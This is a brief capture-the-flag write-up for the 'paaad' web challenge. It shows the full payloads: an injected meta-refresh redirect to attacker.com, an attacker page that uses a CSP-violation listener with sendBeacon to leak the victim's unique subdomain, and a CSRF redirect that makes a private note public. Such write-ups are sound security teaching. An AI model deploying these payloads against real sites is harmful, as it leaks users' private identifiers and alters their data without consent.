tl;dr

• meta redirect to attacker website, using the html injection in the paaad.
• leak the unique subdomain with csp violation.
• Another meta redirect csrf with the leaked subdomain to make the note public.

First pad

<!-- redirect to attacker site -->
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">

https://attacker.com/attacker.html

<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
    <title>TEST</title>
</head>

<body>
    <script>
        document.addEventListener('securitypolicyviolation', async function (event) {
            console.log(event)
            navigator.sendBeacon(location.href,event.blockedURI)

        });      
    </script>
    <iframe src="https://päääd.space/p/latest"></iframe>
</body>

</html>

Second pad

<!-- to make pad public-->
<meta http-equiv="refresh" content="1; url=unique_id.xn--pd-viaaa.space?edit=isPublic">

Original writeup (http://blog.bi0s.in/2023/10/16/Web/paaad-Hack.luCTF20232023/).